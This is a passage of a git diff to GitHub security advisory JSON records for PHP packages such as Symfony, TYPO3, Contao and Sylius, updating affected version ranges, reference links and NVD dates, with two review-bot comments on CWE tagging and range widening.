@@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.0.0" + }, + { + "fixed": "4.4.46" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "contao/contao" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.5.0" + }, + { + "fixed": "4.8.6" + } + ] + } + ] } ], "references": [ @@ -71,6 +109,10 @@ "type": "WEB", "url": "https://contao.org/en/security-advisories/unrestricted-file-uploads.html" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/contao/CVE-2019-19745.yaml" + }, { "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/contao/core-bundle/CVE-2019-19745.yaml" @@ -87,6 +129,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2019-12-17T19:42:31Z", - "nvd_published_at": null + "nvd_published_at": "2019-12-17T15:15:25Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json b/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json index d1bada0c5637d..878cbc2e7c9b7 100644 --- a/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json +++ b/advisories/github-reviewed/2020/01/GHSA-8vp7-j5cj-vvm2/GHSA-8vp7-j5cj-vvm2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-8vp7-j5cj-vvm2", - "modified": "2021-01-08T20:32:44Z", + "modified": "2024-02-07T18:42:55Z", "published": "2020-01-31T18:00:43Z", "aliases": [ "CVE-2020-5220" @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.13" + "fixed": "1.4.6" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.5.0" }, { - "fixed": "1.4.6" + "fixed": "1.5.1" } ] } 
@@ -63,10 +63,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "1.5.0" + "introduced": "1.6.0" }, { - "fixed": "1.5.1" + "fixed": "1.6.3" } ] } @@ -75,17 +75,17 @@ { "package": { "ecosystem": "Packagist", - "name": "sylius/resource-bundle" + "name": "sylius/sylius" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.6.0" + "introduced": "0" }, { - "fixed": "1.6.3" + "fixed": "1.3.12" } ] } @@ -101,10 +101,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "1.4.0" }, { - "fixed": "1.3.12" + "fixed": "1.4.4" } ] } @@ -113,17 +113,17 @@ { "package": { "ecosystem": "Packagist", - "name": "sylius/sylius" + "name": "sylius/resource-bundle" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { - "introduced": "1.4.0" + "introduced": "1.0.0" }, { - "fixed": "1.4.4" + "fixed": "1.3.13" } ] } @@ -150,11 +150,12 @@ ], "database_specific": { "cwe_ids": [ + "CWE-200", "CWE-444" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-01-27T20:11:32Z", - "nvd_published_at": null + "nvd_published_at": "2020-01-27T21:15:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json b/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json index 297451312ac44..22dd7ce7c9a8a 100644 --- a/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json +++ b/advisories/github-reviewed/2020/01/GHSA-gp2m-7cfp-h6gf/GHSA-gp2m-7cfp-h6gf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gp2m-7cfp-h6gf", - "modified": "2021-08-19T16:44:17Z", + "modified": "2024-02-07T18:42:34Z", "published": "2020-01-24T21:28:06Z", "aliases": [ "CVE-2017-12873" 
@@ -48,6 +48,10 @@
 "type": "WEB",
 "url": "https://github.com/simplesamlphp/simplesamlphp/commit/90dca835158495b173808273e7df127303b8b953"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2017-12873.yaml"
+ },
 {
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2017/12/msg00007.html"
diff --git a/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json b/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json
index f4731e443eb85..2c19d883522f8 100644
--- a/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json
+++ b/advisories/github-reviewed/2020/01/GHSA-p9cm-r7jg-8q3g/GHSA-p9cm-r7jg-8q3g.json
@@ -44,6 +44,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-9955"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2016-9955.yaml"
+ },
 {
 "type": "WEB",
 "url": "https://lists.debian.org/debian-lts-announce/2018/03/msg00001.html"
diff --git a/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json b/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json
index 4aa68ef1c02c6..40580580dec27 100644
--- a/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json
+++ b/advisories/github-reviewed/2020/02/GHSA-qvrv-2x7x-78x2/GHSA-qvrv-2x7x-78x2.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-qvrv-2x7x-78x2",
- "modified": "2021-08-19T17:22:37Z",
+ "modified": "2024-02-06T17:33:37Z",
 "published": "2020-02-24T17:33:31Z",
 "aliases": [
 "CVE-2019-19325"
@@ -25,10 +25,10 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "4.5.0"
 },
 {
- "fixed": "4.4.5"
+ "fixed": "4.5.2"
 }
 ]
 }
@@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.5.0" + "introduced": "4.0.0" }, { - "fixed": "4.5.2" + "fixed": "4.4.5" } ] } @@ -63,18 +63,27 @@ "type": "WEB", "url": "https://github.com/silverstripe/silverstripe-framework/commit/49fda52b12ba59f0a04bcabf78425586a8779e89" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2019-19325.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2019-19325" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2019-19325/" } ], "database_specific": { "cwe_ids": [ - "CWE-78" + "CWE-78", + "CWE-79" ], "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2020-02-18T20:11:37Z", - "nvd_published_at": null + "nvd_published_at": "2020-02-17T20:15:11Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json b/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json index 57920bfab485d..a50e50e211e40 100644 --- a/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json +++ b/advisories/github-reviewed/2020/02/GHSA-w2fr-65vp-mxw3/GHSA-w2fr-65vp-mxw3.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w2fr-65vp-mxw3", - "modified": "2021-08-19T17:12:23Z", + "modified": "2024-02-05T11:09:27Z", "published": "2020-02-12T18:44:50Z", "aliases": [ "CVE-2019-10912" @@ -223,6 +223,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.8" + } + ] + } + ] } ], "references": [ 
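Review bot: `cwe_ids` in the `@@ -63` hunk now lists both the pre-existing `CWE-78` and the newly added `CWE-79`; OS command injection and cross-site scripting are unrelated weaknesses, and the advisory's `details` (outside this hunk) should support only one of them. If the description is an XSS issue, `CWE-78` looks like a stale mis-tag that this change leaves in place and the list should become `"cwe_ids": [ "CWE-79" ],`; if both are genuinely described, leave it as is but say so in the commit message.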
@@ -246,6 +284,46 @@ "type": "WEB", "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2019-10912.yaml" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2019-10912.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2019-10912.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/42UEKSLKJB72P24JBWVN6AADHLMYSUQD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6QEAOZXVNDA63537A2OIH4QE77EKZR5O/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BAC2TQVEEH5FDJSSWPM2BCRIPTCOEMMO/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BHHIG4GMSGEIDT3RITSW7GJ5NT6IBHXU/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/LFARAUAWZE4UDSKVDWRD35D75HI5UGSD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MDSM576XIOVXVCMHNJHLBBZBTOD62LDA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RTJGZJLPG5FHKFH7KNAKNTWOGBB6LXAL/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZLOZX5BZMQKWG7PJRQL6MB5CAMKBQAWD/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42UEKSLKJB72P24JBWVN6AADHLMYSUQD/" 
@@ -290,6 +368,10 @@ "type": "WEB", "url": "https://symfony.com/cve-2019-10912" }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-016" + }, { "type": "WEB", "url": "https://typo3.org/security/advisory/typo3-core-sa-2019-016/" @@ -306,6 +388,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2020-02-11T20:17:25Z", - "nvd_published_at": null + "nvd_published_at": "2019-05-16T22:29:00Z" } } \ No newline at end of file diff --git a/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json b/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json index fb1012b4fd6e4..cb02ea43b2152 100644 --- a/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json +++ b/advisories/github-reviewed/2020/02/GHSA-x8wj-6m73-gfqp/GHSA-x8wj-6m73-gfqp.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "0" + "introduced": "2.0.0" }, { - "fixed": "1.9.3" + "fixed": "2.1.5" } ] } @@ -44,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "2.0.0" + "introduced": "1.0.0" }, { - "fixed": "2.1.5" + "fixed": "1.9.3" } ] } @@ -67,6 +67,10 @@ "type": "WEB", "url": "https://github.com/1up-lab/OneupUploaderBundle/commit/a6011449b716f163fe1ae323053077e59212350c" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/oneup/uploader-bundle/CVE-2020-5237.yaml" + }, { "type": "WEB", "url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2020-003.txt" diff --git a/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json b/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json index 50e03ae363777..d4ace9791317b 100644 --- a/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json +++ b/advisories/github-reviewed/2020/03/GHSA-g4m9-5hpf-hx72/GHSA-g4m9-5hpf-hx72.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g4m9-5hpf-hx72", - "modified": "2021-01-14T17:48:29Z", + "modified": "2024-02-05T11:13:15Z", "published": "2020-03-30T20:09:44Z", "aliases": [ "CVE-2020-5275" @@ -90,6 +90,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.7" + } + ] + } + ] } ], "references": [ @@ -105,9 +143,25 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/c935e4a3fba6cc2ab463a6ca382858068d63cebf" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2020-5275.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security/CVE-2020-5275.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5275.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5275" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json b/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json index 54bffb6c047dd..06270da720446 100644 --- a/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json +++ b/advisories/github-reviewed/2020/03/GHSA-m884-279h-32v2/GHSA-m884-279h-32v2.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-m884-279h-32v2", - "modified": "2021-05-12T23:54:24Z", + "modified": "2024-02-06T13:30:38Z", "published": "2020-03-30T20:09:31Z", "aliases": [ "CVE-2020-5274" @@ -18,7 +18,7 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/http-foundation" + "name": "symfony/error-handler" }, "ranges": [ { @@ -37,7 +37,45 @@ { "package": { "ecosystem": "Packagist", - "name": "symfony/http-foundation" + "name": "symfony/error-handler" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" }, "ranges": [ { @@ -70,6 +108,18 @@ { "type": "WEB", "url": "https://github.com/symfony/symfony/commit/cf80224589ac05402d4f72f5ddf80900ec94d5ad" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/error-handler/CVE-2020-5274.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5274.yaml" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5274" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json b/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json index 65a960aef24b9..d8cc69c788645 100644 --- a/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json +++ b/advisories/github-reviewed/2020/03/GHSA-mcx4-f5f5-4859/GHSA-mcx4-f5f5-4859.json 
@@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.0.7" + } + ] + } + ] } ], "references": [ @@ -67,6 +105,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/dca343442e6a954f96a2609e7b4e9c21ed6d74e6" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-foundation/CVE-2020-5255.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2020-5255.yaml" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/C36JLPHUPKDFAX6D5WYFC4ALO2K7RDUQ/" @@ -74,6 +120,10 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2020-5255-prevent-cache-poisoning-via-a-response-content-type-header" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2020-5255" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json b/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json index 7fd5d122295b8..6a8baea6e852f 100644 --- a/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json +++ b/advisories/github-reviewed/2020/04/GHSA-24m3-w8g9-jwpq/GHSA-24m3-w8g9-jwpq.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-24m3-w8g9-jwpq", - "modified": "2021-10-20T22:23:05Z", + "modified": "2024-02-06T13:27:42Z", "published": "2020-04-22T20:59:44Z", "aliases": [ "CVE-2020-5301" 
@@ -48,9 +48,17 @@
 "type": "WEB",
 "url": "https://github.com/simplesamlphp/simplesamlphp/commit/47968d26a2fd3ed52da70dc09210921d612ce44e"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/simplesamlphp/simplesamlphp/CVE-2020-5301.yaml"
+ },
 {
 "type": "PACKAGE",
 "url": "https://github.com/simplesamlphp/simplesamlphp/"
+ },
+ {
+ "type": "WEB",
+ "url": "https://simplesamlphp.org/security/202004-01"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json b/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json
index bd72018a33a03..510ad3182961b 100644
--- a/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json
+++ b/advisories/github-reviewed/2020/05/GHSA-2rxh-h6h9-qrqc/GHSA-2rxh-h6h9-qrqc.json
@@ -52,6 +52,44 @@
 ]
 }
 ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "10.0.0"
+ },
+ {
+ "fixed": "10.4.2"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "package": {
+ "ecosystem": "Packagist",
+ "name": "typo3/cms"
+ },
+ "ranges": [
+ {
+ "type": "ECOSYSTEM",
+ "events": [
+ {
+ "introduced": "9.0.0"
+ },
+ {
+ "fixed": "9.5.17"
+ }
+ ]
+ }
+ ]
 }
 ],
 "references": [
@@ -62,6 +100,18 @@
 {
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11066"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11066.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11066.yaml"
+ },
+ {
+ "type": "WEB",
+ "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-004"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json b/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json index 97cba3dd26510..cb7f6f80bb64b 100644 --- a/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json +++ b/advisories/github-reviewed/2020/05/GHSA-2wj9-434x-9hvp/GHSA-2wj9-434x-9hvp.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ @@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11067" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11067.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11067.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-005" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json b/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json index 18ab5e0c6fee5..fcd884a6c27b0 100644 --- a/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json +++ b/advisories/github-reviewed/2020/05/GHSA-347x-877p-hcwx/GHSA-347x-877p-hcwx.json 
@@ -25,17 +25,33 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.4.0" + "introduced": "10.0.0" }, { "fixed": "10.4.2" } ] } - ], - "database_specific": { - "last_known_affected_version_range": "<= 10.4.1" - } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] } ], "references": [ @@ -46,6 +62,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11063" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11063.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11063.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-001" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json b/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json index 89dc023c550c7..bfd6848306d05 100644 --- a/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json +++ b/advisories/github-reviewed/2020/05/GHSA-43gj-mj2w-wh46/GHSA-43gj-mj2w-wh46.json @@ -52,6 +52,44 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ 
@@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11064" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11064.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11064.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-002" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json b/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json index 9028f2930c3dc..3e485c27d5b99 100644 --- a/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json +++ b/advisories/github-reviewed/2020/05/GHSA-4j77-gg36-9864/GHSA-4j77-gg36-9864.json @@ -25,10 +25,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "9.5.12" + "introduced": "10.0.0" }, { - "fixed": "9.5.17" + "fixed": "10.4.2" } ] } @@ -44,7 +44,26 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "10.2.0" + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" }, { "fixed": "10.4.2" @@ -52,6 +71,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.17" + } + ] + } + ] } ], "references": [ 
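Review bot: The `@@ -25,10 +25,10 @@` and `@@ -44,7 +44,26 @@` hunks of GHSA-4j77-gg36-9864 move the typo3/cms-core lower bounds from `9.5.12` and `10.2.0` down to `9.0.0` and `10.0.0`, and the new typo3/cms entries copy the widened ranges. If the earlier, tighter bounds came from the upstream advisory's list of affected versions, the widened ranges will raise alerts for 9.0.0–9.5.11 and 10.0.0–10.1.x installations that were never affected; over-inclusion is the safer failure mode for a scanner, but it still deserves a check against the typo3-core-sa-2020-003 reference that the following hunk adds. The same widening (`10.4.0` to `10.0.0`) occurs in `@@ -25,17 +25,33 @@` of GHSA-347x-877p-hcwx.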
@@ -62,6 +100,18 @@ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-11065" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2020-11065.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2020-11065.yaml" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-core-sa-2020-003" } ], "database_specific": { diff --git a/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json b/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json index 43c68276febbc..1de2d734e785d 100644 --- a/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json +++ b/advisories/github-reviewed/2020/05/GHSA-pqg8-crx9-g8m4/GHSA-pqg8-crx9-g8m4.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-pqg8-crx9-g8m4", - "modified": "2021-11-08T18:49:16Z", + 